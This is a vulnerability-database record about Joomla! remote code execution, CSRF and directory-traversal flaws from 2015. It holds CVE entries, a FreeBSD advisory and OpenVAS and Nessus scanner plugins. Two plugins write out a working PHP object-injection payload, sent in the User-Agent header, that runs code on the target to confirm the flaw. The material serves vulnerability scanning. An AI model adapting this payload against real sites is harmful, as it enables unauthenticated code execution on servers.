{"cve": [{"lastseen": "2019-05-29T18:14:45", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in Joomla! 3.2.0 through 3.3.x and 3.4.x before 3.4.6 allows remote attackers to have unspecified impact via unknown vectors.", "modified": "2015-12-17T17:30:00", "id": "CVE-2015-8565", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8565", "published": "2015-12-16T21:59:00", "title": "CVE-2015-8565", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:14:45", "bulletinFamily": "NVD", "description": "Cross-site request forgery (CSRF) vulnerability in the com_templates component in Joomla! 3.2.0 through 3.3.x and 3.4.x before 3.4.6 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.", "modified": "2015-12-17T17:28:00", "id": "CVE-2015-8563", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8563", "published": "2015-12-16T21:59:00", "title": "CVE-2015-8563", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:14:45", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in Joomla! 3.4.x before 3.4.6 allows remote attackers to have unspecified impact via directory traversal sequences in the XML install file in an extension package archive.", "modified": "2015-12-17T17:30:00", "id": "CVE-2015-8564", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8564", "published": "2015-12-16T21:59:00", "title": "CVE-2015-8564", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:14:45", "bulletinFamily": "NVD", "description": "Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015.", "modified": "2018-10-09T19:58:00", "id": "CVE-2015-8562", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8562", "published": "2015-12-16T21:59:00", "title": "CVE-2015-8562", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:56", "bulletinFamily": "unix", "description": "\nThe JSST and the Joomla! Security Center report:\n\n[20151201] - Core - Remote Code Execution Vulnerability\nBrowser information is not filtered properly while saving the\n\t session values into the database which leads to a Remote Code\n\t Execution vulnerability.\n\n\n[20151202] - Core - CSRF Hardening\nAdd additional CSRF hardening in com_templates.\n\n\n[20151203] - Core - Directory Traversal\nFailure to properly sanitize input data from the XML install file\n\t located within an extension's package archive allows for directory\n\t traversal.\n\n\n[20151204] - Core - Directory Traversal\nInadequate filtering of request data leads to a Directory Traversal\n\t vulnerability.\n\n", "modified": "2016-12-22T00:00:00", "published": "2015-12-14T00:00:00", "id": "A9F60CE8-A4E0-11E5-B864-14DAE9D210B8", "href": "https://vuxml.freebsd.org/freebsd/a9f60ce8-a4e0-11e5-b864-14dae9d210b8.html", "title": "joomla -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:36:41", "bulletinFamily": "scanner", "description": "Joomla! is prone to remote code-execution vulnerability.", "modified": "2018-11-21T00:00:00", "published": "2015-12-16T00:00:00", "id": "OPENVAS:1361412562310105486", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105486", "title": "Joomla! Core Remote Code Execution Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_joomla_79195.nasl 12465 2018-11-21 13:24:34Z cfischer $\n#\n# Joomla! Core Remote Code Execution Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:joomla:joomla';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105486\");\n script_bugtraq_id(79195);\n script_cve_id(\"CVE-2015-8562\", \"CVE-2015-8563\", \"CVE-2015-8564\", \"CVE-2015-8565\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 12465 $\");\n script_name(\"Joomla! Core Remote Code Execution Vulnerability\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-21 14:24:34 +0100 (Wed, 21 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-12-16 15:35:12 +0100 (Wed, 16 Dec 2015)\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"joomla_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"joomla/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/79195\");\n script_xref(name:\"URL\", value:\"https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows attackers to execute arbitrary code\n in the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a special crafted HTTP GET request and check the response for the\n output of the phpinfo() command.\");\n\n script_tag(name:\"insight\", value:\"Browser information is not filtered properly while saving the session values\n into the database which leads to a Remote Code Execution vulnerability.\");\n\n script_tag(name:\"solution\", value:\"Update to 3.4.6 or later.\");\n\n script_tag(name:\"summary\", value:\"Joomla! is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Joomla 1.5.0 through 3.4.5, Joomla 3.2.0 through 3.4.5 and Joomla 3.4.0\n through 3.4.5\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );\n\nvtstrings = get_vt_strings();\n\nif (dir == \"/\")\n dir = \"\";\n\nex = 'phpinfo();JFactory::getConfig();exit';\nex_len = strlen( ex );\n\nagent = '}__' + vtstrings[\"default\"] + '|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"' +\n \"\\0\\0\\0\" + 'disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\"' +\n ':0:{}s:8:\"feed_url\";s:' + ex_len + ':\"' + ex + '\"' +\n ';s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"' +\n \"\\0\\0\\0\" + 'connection\";b:1;}';\n\nagent += '\\xf0\\xfd\\xfd\\xfd';\n\ninjection = make_list( \"User-Agent:\",\"X-Forwarded-For:\" );\n\nhost = http_host_name( port:port );\ncookie = NULL; # nb: To make openvas-nasl-lint happy...\n\nforeach inj ( injection ) {\n for( i = 0; i < 4; i++ ) {\n req = 'GET ' + dir + '/ HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'Connection: close\\r\\n';\n\n if( cookie ) req += 'Cookie: ' + cookie + '\\r\\n';\n\n req += 'Accept-Encoding: identity\\r\\n' +\n 'Accept: */*\\r\\n' +\n inj + ' ' + agent + '\\r\\n\\r\\n';\n\n buf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( ! cookie ) {\n co = eregmatch( pattern:'Set-Cookie: ([^\\r\\n]+)', string:buf );\n cookie = co[1];\n }\n\n if( \"<title>phpinfo()</title>\" >< buf ) {\n security_message( port:port );\n exit( 0 );\n }\n }\n}\n\nexit( 99 );", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:02", "bulletinFamily": "scanner", "description": "Joomla! is prone to remote code-execution vulnerability.", "modified": "2018-10-12T00:00:00", "published": "2015-12-17T00:00:00", "id": "OPENVAS:1361412562310105487", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105487", "title": "Joomla! Core Remote Code Execution Vulnerability (Version Check)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_joomla_79195_3_4_6.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Joomla! Core Remote Code Execution Vulnerability (Version Check)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:joomla:joomla\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105487\");\n script_bugtraq_id(79195);\n script_cve_id(\"CVE-2015-8562\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 11872 $\");\n\n script_name(\"Joomla! Core Remote Code Execution Vulnerability (Version Check)\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/79195\");\n script_xref(name:\"URL\", value:\"https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows attackers to execute arbitrary code\nin the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Check the installed version\");\n\n script_tag(name:\"insight\", value:\"Browser information is not filtered properly while saving the session values\ninto the database which leads to a Remote Code Execution vulnerability.\");\n\n script_tag(name:\"solution\", value:\"Update to 3.4.6 or later.\");\n\n script_tag(name:\"summary\", value:\"Joomla! is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Joomla 1.5.0 through 3.4.5\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-12-17 11:34:17 +0100 (Thu, 17 Dec 2015)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"joomla_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"joomla/installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe:CPE, port:port, exit_no_version:TRUE ) ) exit( 0 );\n\nversion = infos['version'];\n\nif( version_in_range( version:version, test_version:\"1.5.0\", test_version2:\"3.4.5\" ) ) {\n report = 'Installed version: ' + version + '\\n' +\n 'Fixed version: 3.4.6';\n\n if( infos['location'] ) report += '\\nInstall location: ' + infos['location'] + '\\n';\n\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-12-13T07:31:25", "bulletinFamily": "scanner", "description": "The JSST and the Joomla! Security Center report : [20151201] - Core -\nRemote Code Execution Vulnerability Browser information is not\nfiltered properly while saving the session values into the database\nwhich leads to a Remote Code Execution vulnerability. [20151202] -\nCore - CSRF Hardening Add additional CSRF hardening in com_templates.\n[20151203] - Core - Directory Traversal Failure to properly sanitize\ninput data from the XML install file located within an extension", "modified": "2019-12-02T00:00:00", "id": "FREEBSD_PKG_A9F60CE8A4E011E5B86414DAE9D210B8.NASL", "href": "https://www.tenable.com/plugins/nessus/87483", "published": "2015-12-18T00:00:00", "title": "FreeBSD : joomla -- multiple vulnerabilities (a9f60ce8-a4e0-11e5-b864-14dae9d210b8)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87483);\n script_version(\"2.8\");\n script_cvs_date(\"Date: 2018/11/10 11:49:44\");\n\n script_cve_id(\"CVE-2015-8562\", \"CVE-2015-8563\", \"CVE-2015-8564\", \"CVE-2015-8565\");\n\n script_name(english:\"FreeBSD : joomla -- multiple vulnerabilities (a9f60ce8-a4e0-11e5-b864-14dae9d210b8)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The JSST and the Joomla! Security Center report : [20151201] - Core -\nRemote Code Execution Vulnerability Browser information is not\nfiltered properly while saving the session values into the database\nwhich leads to a Remote Code Execution vulnerability. [20151202] -\nCore - CSRF Hardening Add additional CSRF hardening in com_templates.\n[20151203] - Core - Directory Traversal Failure to properly sanitize\ninput data from the XML install file located within an extension's\npackage archive allows for directory traversal. [20151204] - Core -\nDirectory Traversal Inadequate filtering of request data leads to a\nDirectory Traversal vulnerability.\"\n );\n # https://www.joomla.org/announcements/release-news/5641-joomla-3-4-6-released.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b06a8fbc\"\n );\n # https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bec8944e\"\n );\n # https://developer.joomla.org/security-centre/633-20151214-core-csrf-hardening.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?08e45224\"\n );\n # https://developer.joomla.org/security-centre/634-20151214-core-directory-traversal.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c674f363\"\n );\n # https://developer.joomla.org/security-centre/635-20151214-core-directory-traversal-2.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4c388902\"\n );\n # https://vuxml.freebsd.org/freebsd/a9f60ce8-a4e0-11e5-b864-14dae9d210b8.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?408c5832\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Joomla HTTP Header Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:joomla3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"joomla3<3.4.6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:51:54", "bulletinFamily": "scanner", "description": "The Joomla! application running on the remote web server is affected\nby a remote code execution vulnerability due to improper sanitization\nof the User-Agent header field when saving session values. An\nunauthenticated, remote attacker can exploit this, via a serialized\nPHP object, to execute arbitrary PHP code.", "modified": "2019-12-02T00:00:00", "id": "JOOMLA_OBJECT_INJECTION.NASL", "href": "https://www.tenable.com/plugins/nessus/88489", "published": "2016-01-29T00:00:00", "title": "Joomla! User-Agent Object Injection RCE", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88489);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2015-8562\");\n script_bugtraq_id(79195);\n script_xref(name:\"EDB-ID\", value:\"38977\");\n script_xref(name:\"EDB-ID\", value:\"39033\");\n\n script_name(english:\"Joomla! User-Agent Object Injection RCE\");\n script_summary(english:\"Attempts to execute PHP code by header object injection.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\na remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Joomla! application running on the remote web server is affected\nby a remote code execution vulnerability due to improper sanitization\nof the User-Agent header field when saving session values. An\nunauthenticated, remote attacker can exploit this, via a serialized\nPHP object, to execute arbitrary PHP code.\");\n # https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bec8944e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Joomla! version 3.4.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Joomla HTTP Header Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"installed_sw/Joomla!\", \"www/PHP\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nfunction gen_php_object_payload(str)\n{\n local_var objectPayload, injectedCommand, injectionTemplate;\n\n injectedCommand = \"die(md5('\"+str+\"'));\";\n injectionTemplate = injectedCommand+';JFactory::getConfig();exit;';\n\n objectPayload = '}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\\\0\\\\0\\\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}';\n objectPayload += 's:8:\"feed_url\";s:'+strlen(injectionTemplate)+':\"'+injectionTemplate+'\";';\n objectPayload += 's:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\\\0\\\\0\\\\0connection\";b:1;}';\n objectPayload += '\\xf0\\x9d\\x8c\\x86';\n\n return objectPayload;\n}\n\napp = \"Joomla!\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\n\ndir = install['path'];\ninstall_url = build_url(qs:dir, port:port);\n\nhashString = \"NESSUS\" + rand_str(charset:\"0123456789\", length:5);\nhashVal = MD5(hashString);\nobjectInjectionPayload = gen_php_object_payload(str: hashString);\n\n# Send object injection payload in User-Agent.\nclear_cookiejar();\nr = http_send_recv3(method: \"GET\",\n item: dir + \"/index.php\",\n port:port,\n add_headers: make_array(\"User-Agent\", objectInjectionPayload),\n exit_on_fail : TRUE\n);\nreq1 = http_last_sent_request();\n\nheaders = parse_http_headers(status_line:r[0], headers:r[1]);\nif (isnull(headers)) audit(AUDIT_WEB_NO_SERVER_HEADER, port);\n\ncookie = headers['set-cookie'];\nif (isnull(cookie)) exit(1, \"Did not receive a session cookie in the first request to the \" +app+ \" install at \" + install_url);\n\n# Check for executed payload in next request\nr = http_send_recv3(\n method : \"GET\",\n item : dir + \"/index.php\",\n port : port,\n add_headers : make_array(\"Cookies\", cookie),\n exit_on_fail : TRUE\n);\n\n# The hash value was not in the response, so the exploit did not work\nif(hexstr(hashVal) >!< r[2])\n audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n\noutput = strstr(r[2], hexstr(hashVal));\nif (empty_or_null(output)) output = r[2];\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(req1, http_last_sent_request()),\n output : chomp(output)\n);\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:51:53", "bulletinFamily": "scanner", "description": "According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is prior to 3.4.7. It\nis, therefore, affected by multiple vulnerabilities :\n\n - A SQL injection vulnerability exists due to improper\n sanitization of user-supplied input. A remote attacker\n can exploit this to inject or manipulate SQL queries in\n the back-end database, resulting in the manipulation or\n disclosure of arbitrary data.\n\n - A remote code execution vulnerability exists due to\n improper sanitization of session values. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. Note that CVE-2015-8562 was\n addressed in version 3.4.6; however, the core issue\n involves a fix to PHP.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application", "modified": "2019-12-02T00:00:00", "id": "JOOMLA_347.NASL", "href": "https://www.tenable.com/plugins/nessus/87767", "published": "2016-01-06T00:00:00", "title": "Joomla! < 3.4.7 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87767);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\"CVE-2015-8769\");\n script_bugtraq_id(79679);\n\n script_name(english:\"Joomla! < 3.4.7 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Joomla!.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is prior to 3.4.7. It\nis, therefore, affected by multiple vulnerabilities :\n\n - A SQL injection vulnerability exists due to improper\n sanitization of user-supplied input. A remote attacker\n can exploit this to inject or manipulate SQL queries in\n the back-end database, resulting in the manipulation or\n disclosure of arbitrary data.\n\n - A remote code execution vulnerability exists due to\n improper sanitization of session values. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. Note that CVE-2015-8562 was\n addressed in version 3.4.6; however, the core issue\n involves a fix to PHP.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.joomla.org/announcements/release-news/5643-joomla-3-4-7.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3b5dd1d2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Joomla! version 3.4.7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-8769\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/06\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_keys(\"installed_sw/Joomla!\", \"www/PHP\", 